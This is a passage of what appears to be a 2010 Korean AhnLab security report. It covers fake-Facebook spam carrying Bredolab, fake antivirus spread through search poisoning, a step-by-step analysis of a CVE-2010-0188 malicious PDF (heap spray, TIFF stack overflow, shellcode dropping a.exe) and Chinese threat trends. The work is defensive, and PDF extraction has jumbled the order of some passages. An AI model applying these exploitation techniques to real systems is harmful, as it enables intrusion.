계정과비밀번호를 2.5센트라는가격으로판매한다는내용으로써, 많은사용자들에게충격을주었다. 1 현재페이스북에서도법적조치등의강력한대응방침을밝히고있다. 이러한일이발생하고얼마되지않았는데, 이사건을이용하여페이스북에서발송한것처럼가장하여, 고객의안전을위해페이스북비밀번호를변경한다는허위내용을가진메일이악성코드를첨부하여발송되었다. 스팸메일내용은다음과같다. 의오진사고와관련된단어들을검색하게될경우에악성코드를유포하 는웹사이트를검색첫번째페이지로위치하여컴퓨터사용자들의방 문을유도하였다. [ 그림 1-25] 스팸메일내용 스팸메일에첨부된파일은아래그림과같이 Microsoft Office Word 파 일의아이콘을사용하여메일수신자가악성코드를자연스럽게실행하 도록위장하고있다. [ 그림 1-27] 구글검색결과의상단에위치한악의적인웹사이트들 [ 그림 1-26] 스팸메일에첨부된파일해당파일은현재 V3제품군에서 Win-Trojan/Bredolab.48640.B 진단명으로진단및치료가가능하며, 안랩에서는스팸메일을통해유포되는악성코드의위험으로부터사용자를보호하기위해아래와같이가이드를제시하니, 많은활용을바란다. 해당웹사이트링크를클릭하게되면아래이미지와같이경고창을보 여주며사용하는시스템에악성코드가감염되었다는거짓정보를보여 준다. 1. 발신인이불분명한메일일경우가급적메일을확인하지않고, 삭제 한다. 2. 안티바이러스 ( 백신 ) 프로그램을설치하여항상최신엔진을유지하며, 실시간감시기능을사용한다. 3. 메일내에포함된첨부파일에대해안티바이러스 ( 백신 ) 프로그램으로검사를한후열람한다. 4. 메일본문에포함된 URL은가급적접속을하지않는다. 맥아피오진사고소식으로위장해구글검색결과로허위백신유포 [ 그림 1-28] 악성코드에감염되었다고알리는허위경고창그리고확인을클릭하게되면아래이미지와같이허위로제작된백신의컴퓨터검색이진행되며사용하는시스템에심각한악성코드가감염되어있다는것을보여주며사용자들에게거짓정보들을보여주게된다. 해외시각으로 4월 21일미국보안업체인맥아피 (McAfee) 에서정상윈도우 (Win dows) 시스템파일인 svchost.exe를 W32/Wecorl.a 악성코드로잘못진단하는오진 (False Positive) 사고가발생하였다. 이러한맥아피의오진사고를이용하여구글 (Google) 검색엔진에서검색순위를상위로조정하여악성코드를유포하는웹사이트로컴퓨터사용자들을유도하는블랙햇 (BlackHat) SEO(Search Engine Optimization) 기법을통해허위백신의유포를시도한사례가발견되었다. 이번에구글검색엔진을통해유포된허위백신은아래이미지에서와같이이번맥아피 1.http://www.boannews.com/media/view.asp?idx=20621&kind=0 AhnLab Online Security 2.0 세상에서가장안전한이름안철수연구소 09

[ 그림 1-29] 조작된결과를보여주는허위백신의검색결과 사용하는컴퓨터의검색결과가종료되면아래이미지와같은경고창을보여주며윈도우시스템에서사용하는정상파일인 explorer.exe가악성코드에감염되었으므로치료하여야한다는거짓메시지로컴퓨터사용자들을현혹하게된다. [ 그림 1-30] 정상파일을악성코드로진단하여사용자에게허위결과를제공 위이미지의 Protect 버튼을클릭하게되면 setup_build30 _195. exe(353,280 바이트 ) 의파일을다운로드하여실행할것을유도하고있다. 그러나실제로해당파일을다운로드하여실행하게되면이미지에서와같이해외에서제작된허위백신이시스템에서설치되며, 시스템에존재하는정상파일들이악성코드에감염된것으로거짓검색결과를보여주며금전결제를유도한다. AhnLab SiteGuard Pro 10 ASEC Report _ 2010. Vol.04

Ⅱ. 칼럼 1. PDF 취약점을이용한악성코드의반란 2007년부터출현하기시작한 Adobe Acrobat Reader 취약점즉, 일명 PDF 취약점들을악용하는공격은 2008년과 2009년을거치면서본격적으로파일기반공격의대표주자가되었다. 올해도 PDF 취약점들이이미다수보고되었고, PDF 취약점을이용하는공격에대한관심은꾸준히증가할것으로예상된다. 우선, 작년 7월에발표된 Adobe Reader, Acrobat and Flash Player Remote Code Execution(CVE-2009-1862) 취약점을기억해보자. 해당취약점은플래시플래이어상에존재하는취약점이지만, 취약한플래시엔진이 Adobe Acrobat Reader 상에도탑재되어있어또다른 PDF 취약점으로보고되었다. 따라서, 하나의악의적인플래시 (Flash) 파일을 PDF 파일속에삽입 (Embedded) 시킴으로써웹뿐만아니라 PDF 파일을이용한다중공격도가능한재미있는사례였다. 이번칼럼에서다루고자하는 CVE-2010-0188 취약점 1 또한이와유사한사례라고할수있다. 과거, 2006년에발표된 LibTIFF TiffFetch- ShortPair Remote Buffer Overflow (CVE-2006-3459) 취약점은초기 iphone을 Jailbreak 하기위한용도로사용되어더유명하다. 해당취약점은오픈소스라이브러리인 libtiff 3.8.1 이하에서존재하는데, 해당라이브러리가 Adobe Reader 9.3.0 이하의버전에도탑재되면서또하나의 PDF 취약점이탄생되었다. 이미존재했던취약한 TIFF(Tag Image File Format) 파일을 PDF 파일에삽입 (embedded) 시키는방법으로 PDF를통한공격이가능하게되었다. 이처럼하나의취약점을통해다중의애플리케이션에영향을미치는사례들이종종발견됨에따라, 오픈소스라이브러리를사용하거나호환성및기능확장을위해서동일한엔진을탑재하는경우동일한문제가발생될가능성에대해서관심을가질필요가있겠다. 해당취약점은 MS사의 Malware Protection Center 블로그를통해서확산이경고되기시작하였고, 실제로기존의파일기반공격들과마찬가지로사회공학적공격방법인 E-Mail의첨부파일형태로전파되고있다. [ 그림 2-1] 취약점을내포한 PDF 파일을전파하는이메일 ( 출처 : Crontab) 그럼, 본격적으로 CVE-2010-0188 취약점을이용하는악성 PDF 파일에대해서분석해보자. 해당칼럼에서는파일기반공격의특징을고려하여, 동적분석에앞서정적 (Static) 분석을통해시나리오를예측하고, 동적 (Dynamic) 분석을통해이를검증해보는방식으로진행하고자한다. 정적 (Static) 분석하기과거악성 PDF 파일은직접열어보는방법만으로도충분히인코딩되지않은내부의자바스크립트문자열을발견할수있었다. 그러나, 최근에는다양한인코딩방법을이용하여컨텐츠를내부에숨기고있고, 일차적으로자바스크립트의사용을판별하기위해검색되었던, 자바스크립트 (/JS, /Javascript) 관련문자열도함께인코딩하므로써분석이나탐지를더욱난해하게만들기도한다. 따라서, 우선적으로대표적으로사용되는압축 (/FlateDecode) 스트림데이터들을풀어서내부의컨텐츠를좀더상세히살펴보도록하자. AhnLab TrusGuard DPX [ 그림 2-2] 내부자바스크립트 1.http://www.adobe.com/support/security/bulletins/apsb10-07.html 세상에서가장안전한이름안철수연구소 11

해당 PDF 파일안에는위와같은자바스크립트가압축된스트림데이터로숨겨져있었고, 이는기존의웹공격과 PDF 파일공격에서자주사용하는 Heap-Spray 기법을사용하고있다. 1 쉘코드 ( 공격자코드 ) + 2 Heap-Spraying 코드 + 3 취약점발생코드직접적으로취약점을발생시키는 exploit.tif 파일또한다른압축된스트림속에존재하며, 이를압축해제한후 Base64로디코딩하면다음과같이악의적인 TIFF 형태를얻을수있다. 동적 (Dynamic) 분석하기이제앞서예상한시나리오대로실제동작이이루어지는지를코드레벨로따라가면서검증해보도록하자. 악성 PDF 파일을실행시키면, 다음과같이 AcroForm.api 의 TIFFReadire tory 루틴이반복적으로돌면서 exploit.tif 파일데이터를파싱하게되는데, 이때, DotRange Value 값을 memcpy() 함수를통해스택으로복사하게된다. [ 그림 2-3] 압축해제 [ 그림 2-6] 스택오버플로우발생함수 [ 그림 2-4] Base64 디코딩 그럼, TIFF 파일의내부구조를살펴보자. 데이터가복사되기전과후의스택의모습을살펴보면, 원래스택의로 컬버퍼공간을넘어서 RET 주소가 0X0C0C0C0C 값으로덮어써지는 것을알수있다. [ 그림 2-7] 스택구조 [ 그림 2-5] exploit.tif 내부구조실제 exploit.tif파일의내부에는앞서언급한 CVE-2006-3459 취약점의원인이되었던 DotRange(Tag ID: 0x0150) 태그가존재하며, DotRange Value 데이터부분은다수의 0C0C0C0C 값으로채워져있다. 0C0C0C0C 값은 Heap-Spray 기법에서쉘코드가위치한점프지점으로애용되는메모리주소값이기도하다. 그렇다면, 실제파일을실행시켜보지않고도지금까지의데이터를종합해보는것만으로파일의공격시나리오를예상해볼수있다. 아마도 TIFF 파일을파싱하는과정에서할당된버퍼공간보다많은 DotRange Value 문자열을스택으로복사하면서원래의리턴주소 (RET) 나예외처리핸들러 (SEH) 주소의위치가 0X0C0C0C 값으로덮어씌워지게될것이다. 따라서, 이후리턴하는과정에서자바스크립트를통해서미리채워진 0X0C0C0C0C 지점으로프로그램의흐름이변경되고공격자의쉘코드가실행되는구조를가질것으로예상된다. 함수가리턴되기전자바스크립트를통해일정한힙공간은공격자의쉘코드로미리채워져있고, 힙메모리주소중 0X0C0C0C0C 지점에 BP(BreakPoint) 를걸어놓으면덮어쓰여진 RET 주소값이참조되면서해당주소로점프하는것을확인할수있다. 점프된지점으로부터불필요한 NOP 코드를거치고나면, 다음과같이뒤이어존재하는실제공격자의쉘코드가수행된다. AhnLab V3 Zip 12 ASEC Report _ 2010. Vol.04

하여사용하는것이다. 2. 중국동향과이슈 중국 MS10-018 취약점 1800만웹사이트에서악용 4월 8일중국보안업체인라이징 (Rising) 에서는 3월 11일알려진마이크로소프트 (Microsoft) 인터넷익스플로러 (Internet Explorer) 취약점인 MS10-018 취약점을악용하는웹사이트가 4월로접어들면서급격한증가를보이고있다. [ 그림 2-8] 쉘코드실행 [ 그림 2-11] 중국내에서급격히증가중인 MS10-018 취약점을악용한공격 [ 그림 2-9] 쉘코드디코딩후실제쉘코드는다음과같이내부의디코딩루틴을거쳐 PDF 파일내부로부터 C:\ 드라이브상에 a.exe(win-trojan/qaantiz. 61044) 파일을드롭하여실행한다. 라이징에서발표한바에따르면, 인터넷익스플로러의 MS10-018 취약점을악용하는공격은 3월부터 4월 7일까지총 1839 만회가발생하였으며 4월 7일하루동안에만중국내부에서 310 만건이발견한것으로밝히고있다. 그러나아직중국내부시스템들의 50% 정도만보안패치를설치한것으로분석하고있다. 해당 MS10-018 취약점에대한보안패치는 3월 31일마이크로소프트를통해배포되었으므로윈도우업데이트를통해즉시설치하는것이중요하다. 킹소프트 2009년중국보안위협동향발표 중국보안업체인킹소프트 (KingSoft) 에서 2009년중국에서발생한다양한보안위협들을정리한중국보안위협동향보고서를발표하였다. 이번에킹소프트를통해발표된 2009년중국보안위협동향보고서를정리하면다음과같은내용들을담고있으며이와더불어 2010년에발생될것으로예측한보안위협들도같이공개하였다. 2009 년중국보안위협동향분석 [ 그림 2-10] 악성 PDF 동작프로세스이번취약점뿐만아니라지금까지보고된많은수의 PDF 취약점들은공격성공을위해직 / 간접적으로자바스크립트를사용하고있다. 따라서, 상황에따라 Adobe Reader의 JavaScript 사용가능 (J) 옵션을해제함으로써임시적인피해를줄일수있다. 그러나, 무엇보다도안전한방법은안티바이러스제품을보안패치와함께항상최신버전으로업데이트 킹소프트에서발표된바에따르면, 2009년한해동안총 20,684,223개의악성코드가중국에서발견되었으며 2008년 13,899,717개에서 49% 나증가한수치이다. 여기서 2008년이전의수치와급격하게차이가나는점에대해 2008년부터클라우드보안 (Cloud Security) 기술을제품에적용하였기때문이라고한다. 세상에서가장안전한이름안철수연구소 13

[ 그림 2-12] 2003 년부터 2009 년까지발견된악성코드수치 이렇게발견된악성코드는형태별로분류하게될경우에는아래이미지에서와같이트로이목마가 73.6% 로총 15,223,588개가발견되어가장많은수치를차지하는것으로분석하였다. 이렇게트로이목마가가장많은비율을차지하고있는원인으로는웹사이트를통해유포되기때문이며발견된트로이목마중에서는 8,393,781개가웹사이트를통해유포되었다고한다. [ 그림 2-14] 바이두의검색결과상위에차지하고있는악의적인웹사이트들킹소프트에서제공한위이미지에서와같이바이두웹사이트에서특정검색어로검색을시도할경우악의적인웹사이트를검색순위에서높게나오도록하는것으로중국내부에서는검색결과의상위 20개중 10 개이상이악의적인웹사이트인경우도있다고한다. 2009년주요중국보안사고킹소프트에서는 2009년의중국주요보안사고를발표하였다. 음력을기준으로하여선정되었음을밝히고있어양력날짜와차이가있을수있다. 1) 2010년 1월 12일에발생한 DNS 서버조작을악용한바이두웹사이트에대한분산서비스거부공격 [ 그림 2-13] 2009년발견된악성코드형태분류에서트로이목마가 73.6% 를차지그리고클라우드보안기술을통해중국내부에서약 84억회의클라우드데이터베이스 (Database) 로조회가발생하였으며약 7600만대의컴퓨터시스템이악성코드감염이되었음을확인하였다고한다. 이렇게감염시스템의수치는 2008년과비교하여 13.8% 가증가한수치인것으로밝히고있다. 그리고피싱 (Phishing) 을목적으로제작된악의적인웹사이트역시 2009년하반기부터급증하기시작하여 12월 1달간발견된수치만도약 1만개를넘고있다고한다. 2009년주요악성코드기술적동향분석킹소프트에서는중국내대표검색웹사이트인바이두 (Baidu) 를통해악성코드를유포하기위해사용하는블랙햇 SEO(BlackHat Search Engine Optimization) 가최근의악성코드배포기술적동향중에서가장대표적인것으로발표하였다. 킹소프트에서는대형웹사이트에대한직접적인공격이나해킹의어려움으로 DNS 조작을통해분산서비스거부공격이발생한것으로분석하고있다. 2) MS10-002 인터넷익스플로러 (Internet Explorer) 의제로데이취약점을악용한공격 2010년 1월 15일알려진해당취약점은마이크로소프트에서보안패치를제공하기전까지매일 36.3% 의수치로공격이증가하였으며최고 1 일 428,144회의공격이발견되기도하였다고한다. 3) 중국음악포털사이트공격으로인한인터넷접속불가 2009년 5월 9일발생한해당사고는중국의유명음악포털사이트에대한공격도중에갑자기 DNS 조회가급격하게증가하게되어많은시스템들이 DNS 조회실패가발생하게되었다. 이문제로중국내 10개도시에서 1시간넘게인터넷을정상적으로사용하지못한문제가발생하였다. 4) 유해차단소프트웨어그린댐유스에스코트 (Green Dam Youth Escort) 설치논란 2009 년 6 월중국정부에서는유해차단소프트웨어인그린댐유스에스 코드프로그램을의무적으로설치할것을시도하였으나중국내외적으로 14 ASEC Report _ 2010. Vol.04

많은반대의견으로인해 7월 1일중국정부에서는한발물러선해당정책에대한유보를발표하였다. 5) 허위백신의유포를금전적이득획득 2009년들어진단과치료가정상적으로되지않는허위백신이중국내에서많이유포되면서이를이용해금전적인이득을얻고자하였다. 6) 중국 11차인민대회를통한형법개정 2009년 2월중국에서는 11차전국인민대회를통해사이버범죄와관련한형법을개정하였다. 이번개정에서는그동안중국내외에서많은문제제기가있었던사이버범죄와관련한형법을개정하여처벌수위가강해졌다. 7) 猫癬 ( 묘선 ) 악성코드의대량감염해당악성코드는중국킹소프트의진단명으로서 2009년 1월 18일발견되었으며, usp10.dll 파일명으로네트워크와 USB 를통해감염된다. 현재까지변형이약 500개정도발견되었으며중국내부에서만매일평균약 40만대의컴퓨터시스템이감염되었다. 2010년보안위협예측분석킹소프트에서는 2009년분석한보안위협동향들을바탕으로 2010년에발생가능한보안위협들을다음과같이정리하였다. 1) 제로데이 (Zero-Day, 0-Day) 취약점의증가 2) 웹사이트를통해유포되는악성코드와피싱웹사이트의증가 3) 트로이목마의지속적인증가 4) 무선네트워크를이용한공격증가이렇게중국보안업체인킹소프트에서는 2009년한해동안중국에서발생한다양한보안위협들을정리하였다. 중국은지리적으로한국과가까울뿐아니라. 네트웍환경도밀접한관계를가지고있기때문에중국의보안이슈및동향은지속적으로관심을가져야할정보이다. 따라서독자분들은수시로발표되는중국관련기사에많은관심을가지길바란다. AhnLab Hackshield For Online Game 2.0 세상에서가장안전한이름안철수연구소 15